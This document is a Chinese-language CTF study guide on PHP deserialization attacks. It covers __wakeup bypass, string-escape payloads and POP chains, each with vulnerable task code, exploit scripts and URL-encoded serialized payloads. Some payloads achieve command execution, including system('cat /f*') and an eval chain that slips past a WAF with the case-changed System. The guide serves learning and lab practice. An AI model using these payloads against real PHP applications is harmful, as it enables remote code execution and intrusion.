一、简单的反序列化题目
1.P1
task.php
<?php
highlight_file(__FILE__);class NSS {var $name;function __destruct() {if ($this->name === 'ctf') {echo getenv('FLAG');}}
}unserialize($_GET['n']);
exp.php
<?phpclass NSS {var $name='ctf';}$a=new NSS();
print(urlencode(serialize($a)));//O%3A3%3A%22NSS%22%3A1%3A%7Bs%3A4%3A%22name%22%3Bs%3A3%3A%22ctf%22%3B%7D
2.[SWPUCTF 2021 新生赛]ez_unserialize
task.php
<?phperror_reporting(0);
show_source("cl45s.php");class wllm{public $admin;public $passwd;public function __construct(){$this->admin ="user";$this->passwd = "123456";}public function __destruct(){if($this->admin === "admin" && $this->passwd === "ctf"){include("flag.php");echo $flag;}else{echo $this->admin;echo $this->passwd;echo "Just a bit more!";}}
}$p = $_GET['p'];
unserialize($p);?>
exp.php
O%3A4%3A%22wllm%22%3A2%3A%7Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22passwd%22%3Bs%3A3%3A%22ctf%22%3B%7D<?phpclass wllm{public $admin="admin";public $passwd="ctf";}$a=new wllm();
print(urlencode(serialize($a)));
//O%3A4%3A%22wllm%22%3A2%3A%7Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22passwd%22%3Bs%3A3%3A%22ctf%22%3B%7D
二、wake_up 绕过
1.P3
task.php
<?php
highlight_file(__FILE__);class NSS {var $name;function __wakeup() {$this->name = '1';}function __destruct() {if ($this->name === 'ctf') {echo getenv('FLAG');}}
}unserialize($_GET['n']);
exp.php
<?phpclass NSS {var $name='ctf';
} $a=new NSS();print(urlencode(serialize($a)));//O%3A3%3A%22NSS%22%3A1%3A%7Bs%3A4%3A%22name%22%3Bs%3A3%3A%22ctf%22%3B%7D
//O%3A3%3A"NSS"%3A2%3A{s%3A4%3A"name"%3Bs%3A3%3A"ctf"%3B}
2.[极客大挑战 2019]PHP
task.php
<?php
include 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}
}
?>
exp.php
<?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}
}
$a=new Name("admin","100");print(urlencode(serialize($a)));//O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D//O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
三、反序列化字符逃逸
1.字符增加
(1).task.php
<?php
error_reporting(0);class a
{public $uname;public $password;public function __construct($uname,$password){$this->uname=$uname;$this->password=$password;}public function __wakeup(){if($this->password==='yu22x'){include('flag.php');echo $flag; }else{echo 'wrong password';}}}function filter($string){return str_replace('Firebasky','Firebaskyup',$string);
}$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>
思路分析
需要反序列化后的password变成yu22x
我们随便带入一个username,password修改为yu22x得到目标字符串
<?phpclass a
{public $uname;public $password;public function __construct($uname,$password){$this->uname=$uname;$this->password=$password;}public function __wakeup(){if($this->password==='yu22x'){include('flag.php');echo $flag; }else{echo 'wrong password';}}
}$b=new a('admin','yu22x');
echo serialize($b);#O:1:"a":2:{s:5:"uname";s:5:"admin";s:8:"password";s:5:"yu22x";}
其中我们需要利用的子串是";s:8:“password”;s:5:“yu22x”;}长度30位。
观察替换规则,由Firebasky变成Firebaskyup字符增加2,因此我们需要15个Firebasky
得到payload:
FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}
(2).index.php
<?php
error_reporting(0);
class message{public $from;public $msg;public $to;public $token='user';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;}
}$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];if(isset($f) && isset($m) && isset($t)){$msg = new message($f,$m,$t);$umsg = str_replace('fuck', 'loveU', serialize($msg));setcookie('msg',base64_encode($umsg));echo 'Your message has been sent';
}highlight_file(__FILE__);
message.php
<?php
highlight_file(__FILE__);
include('flag.php');class message{public $from;public $msg;public $to;public $token='user';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;}
}if(isset($_COOKIE['msg'])){$msg = unserialize(base64_decode($_COOKIE['msg']));if($msg->token=='admin'){echo $flag;}
}
思路分析
我们需要把message中的token修改为admin获得flag
首先得到目标字符串
<?phpclass message{public $from;public $msg;public $to;public $token='admin';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;}
}$b=new message('1','2','3');
echo serialize($b);#O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:1:"3";s:5:"token";s:5:"admin";}
我们需要构造的子串是";s:5:“token”;s:5:“admin”;},长度为27,观察替换规则,一个fuck,变成一个loveU,字符增加1,我们需要27个fuck。
payload:
?f=1&m=1&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}
然后访问messa.php获得flag
(3).index.php
<?php
highlight_file(__FILE__);
function waf($str){return str_replace("bad","good",$str);
}class GetFlag {public $key;public $cmd = "whoami";public function __construct($key){$this->key = $key;}public function __destruct(){system($this->cmd);}
}unserialize(waf(serialize(new GetFlag($_GET['key']))));
思路分析
通过控制GetFlag当中的cmd来执行不同的系统命令,获得flag。
假设我们想要执行ls命令,那么目标字符串就是 O:7:“GetFlag”:2:{s:3:“key”;s:1:“1”;s:3:“cmd”;s:2:“ls”;}
那么我们需要构造的字串是";s:3:“cmd”;s:2:“ls”;},长度为22,观察替换规则,bad变为good,这时候增加一个字符,因此需要22个bad。
payload:
?key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:2:"ls";}
这时候,我们成功执行了ls命令
最终payload:
?key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:7:"cat /f*";}
2.字符减少
(1).task.php
<?php
function filter($string){$filter = '/pp/i';return preg_replace($filter,'W',$string);
}
$username = "ppurlet"
$age = "10";
$user = array($username,$age);var_dump (serialize($user)); # 序列化
echo "<pre>";
$r = filter(serialize($user)); # 替换后序列化
var_dump ($r);
var_dump (unserialize($r)); # 打印反序列
?>
//将age修改为20
思路分析
目标字符串 a:2:{i:0;s:7:“ppurlet”;i:1;s:2:“20”;}
如果我们控制age=20,正常序列化的结果是;i:1;s:2:“20”;}
在其前边插入任意字符和双引号序列化之后得到:a:2:{i:0;s:7:“Wurlet”;i:1;s:17:“1”;i:1;s:2:“20”;}";}
需要吞掉";i:1;s:17:"1这个字符串也就是13个字符。
<?php
function filter($string){$filter = '/pp/i';return preg_replace($filter,'W',$string);
}
$username = "pppppppppppppppppppppppppp"; //长度为13
$age = '1";i:1;s:2:"20";}'; //正常序列化的结果
$user = array($username,$age);var_dump (serialize($user)); # 序列化
echo "<pre>";
$r = filter(serialize($user)); # 替换后序列化
var_dump ($r);
var_dump (unserialize($r)); # 打印反序列
?>
//将age修改为20
四、POP链构造
P5
task.php
<?php
highlight_file(__FILE__);class NSS1 {var $name;function __destruct() {echo $this->name;}
}class NSS2 {var $name;function __toString(){echo getenv('FLAG');}
}unserialize($_GET['n']);
exp.php
<?phpclass NSS1 {var $name;
}class NSS2 {var $name;}$a=new NSS1();
$a->name=new NSS2();
echo(serialize($a));
P6
task.php
<?php
highlight_file(__FILE__);class NSS1 {var $name;function __destruct() {echo $this->name;}
}class NSS2 {var $name;function __toString(){echo $this->name->test;}
}class NSS3 {var $name;var $res;function __get($name){$this->name->getflag();}function __call($name, $arguments){if ($this->res === 'nssctf') {echo getenv('FLAG');}}
}
unserialize($_GET['n']);
思路分析
调用链:NSS1__destruct() → \rightarrow → NSS2.__toString() → \rightarrow →NSS3.__get() → \rightarrow →NSS3.____call()
exp.php
<?phpclass NSS1 {var $name;function __destruct() {echo $this->name;}
}class NSS2 {var $name;function __toString(){echo $this->name->test;}
}class NSS3 {var $name;var $res;function __get($name){$this->name->getflag();}function __call($name, $arguments){if ($this->res === 'nssctf') {echo getenv('FLAG');}}
}$a=new NSS1();
$a->name=new NSS2();
$a->name->name=new NSS3();
$a->name->name->name=new NSS3();
$a->name->name->name->res='nssctf';
echo serialize($a);//O:4:"NSS1":1:{s:4:"name";O:4:"NSS2":1:{s:4:"name";O:4:"NSS3":2:{s:4:"name";O:4:"NSS3":2:{s:4:"name";N;s:3:"res";s:6:"nssctf";}s:3:"res";N;}}}
P7
task.php
<?php
highlight_file(__FILE__);class NSS1 {var $name;function __destruct() {echo $this->name;}
}class NSS2 {var $name;private $test;function __set($name, $value) {$a = $this->test;$a($value);}function __toString() {$this->name->{$this->test}();}
}class NSS3 {var $name;var $res;function __invoke($v) {echo $this->name->flag($v);}function flag($a) {if ($a === '1') {return getenv('FLAG');}}function __call($name, $arguments){$this->name->a = '1';}
}
unserialize($_GET['n']);
思路分析
调用链:
NSS1.destruct() → \rightarrow → NSS2.toString() → \rightarrow →NSS3.call() → \rightarrow →NSS2.set() → \rightarrow →NSS3.invoke() → \rightarrow →NSS3.flag
需要注意的是,在NSS2中test是私有属性,因此要通过成员函数赋值。
exp.php
<?phpclass NSS1 {var $name;
}
class NSS2 {var $name;private $test;function setTest($v) {$this->test=$v;}
}
class NSS3 {var $name;var $res;
}
$a=new NSS1();
$a->name=new NSS2();
$a->name->setTest('1');
$a->name->name=new NSS3();
$a->name->name->name=new NSS2();$b = new NSS3();
$b->name = new NSS3();
$a->name->name->name->setTest($b);
echo(urlencode(serialize($a)));
[SWPUCTF 2021 新生赛]pop
task.php
<?phperror_reporting(0);
show_source("index.php");class w44m{private $admin = 'aaa';protected $passwd = '123456';public function Getflag(){if($this->admin === 'w44m' && $this->passwd ==='08067'){include('flag.php');echo $flag;}else{echo $this->admin;echo $this->passwd;echo 'nono';}}
}class w22m{public $w00m;public function __destruct(){echo $this->w00m;}
}class w33m{public $w00m;public $w22m;public function __toString(){$this->w00m->{$this->w22m}();return 0;}
}$w00m = $_GET['w00m'];
unserialize($w00m);?>
思路分析
调用链:w22m.destruct() → \rightarrow →w33m.tostring → \rightarrow →w44m.Getflag()
exp.php
<?phpclass w44m{private $admin = 'w44m';protected $passwd = '08067';
}class w22m{public $w00m;
}class w33m{public $w00m;public $w22m;
} $a=new w22m();
$a->w00m=new w33m();
$a->w00m->w00m=new w44m();
$a->w00m->w22m="Getflag";
echo urlencode(serialize($a));//O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D
exp2.php
<?phpclass w44m{private $admin = '123456';protected $passwd = '123';function SetAdmin($v){$this->admin=$v;}function SetPasswd($x){$this->passwd=$x;}
}class w22m{public $w00m;
}class w33m{public $w00m;public $w22m;
} $a=new w22m();
$a->w00m=new w33m();
$b=new w44m();
$b->SetAdmin('w44m');
$b->SetPasswd('08067');
$a->w00m->w00m=$b;
$a->w00m->w22m="Getflag";
echo urlencode(serialize($a));//O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D
[NISACTF 2022]babyserialize
task.php
<?php
include "waf.php";
class NISA{public $fun="show_me_flag";public $txw4ever;public function __wakeup(){if($this->fun=="show_me_flag"){hint();}}function __call($from,$val){$this->fun=$val[0];}public function __toString(){echo $this->fun;return " ";}public function __invoke(){checkcheck($this->txw4ever);@eval($this->txw4ever);}
}class TianXiWei{public $ext;public $x;public function __wakeup(){$this->ext->nisa($this->x);}
}class Ilovetxw{public $huang;public $su;public function __call($fun1,$arg){$this->huang->fun=$arg[0];}public function __toString(){$bb = $this->su;return $bb();}
}class four{public $a="TXW4EVER";private $fun='abc';public function __set($name, $value){$this->$name=$value;if ($this->fun = "sixsixsix"){strtolower($this->a);}}
}if(isset($_GET['ser'])){@unserialize($_GET['ser']);
}else{highlight_file(__FILE__);
}//func checkcheck($data){
// if(preg_match(......)){
// die(something wrong);
// }
//}//function hint(){
// echo ".......";
// die();
//}
?>
思路分析
由危险函数eval,推出invoke,进而是Ilovetxw的tostring,进而是four里的strtolower,进而是four里的set,进而是Ilovetxw的call,进而是TianXiWei里的wakeup
因此,调用链:TianXiWei::wakeup → \rightarrow → Ilovetxw::call → \rightarrow → four::set → \rightarrow → four::strtolower → \rightarrow → Ilovetxw::tostring → \rightarrow → NISA::invoke → \rightarrow → NISA::eval
waf里边过滤了system和其他函数,但是可以大小写绕过。
exp.php
<?phpclass NISA{public $fun="";public $txw4ever='System("cat /f*");';
}class TianXiWei{public $ext;public $x;
}class Ilovetxw{public $huang;public $su;
}class four{public $a="TXW4EVER";private $fun='sixsixsix';
}$xx=new TianXiWei();
$xx->ext=new Ilovetxw();
$xx->ext->huang=new four();
$xx->ext->huang->a=new Ilovetxw();
$xx->ext->huang->a->su=new NISA();
echo urlencode(serialize($xx));//O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BN%3Bs%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22txw4ever%22%3Bs%3A18%3A%22System%28%22cat+%2Ff%2A%22%29%3B%22%3B%7D%7Ds%3A9%3A%22%00four%00fun%22%3Bs%3A9%3A%22sixsixsix%22%3B%7Ds%3A2%3A%22su%22%3BN%3B%7Ds%3A1%3A%22x%22%3BN%3B%7D
phar反序列化
待续。。。。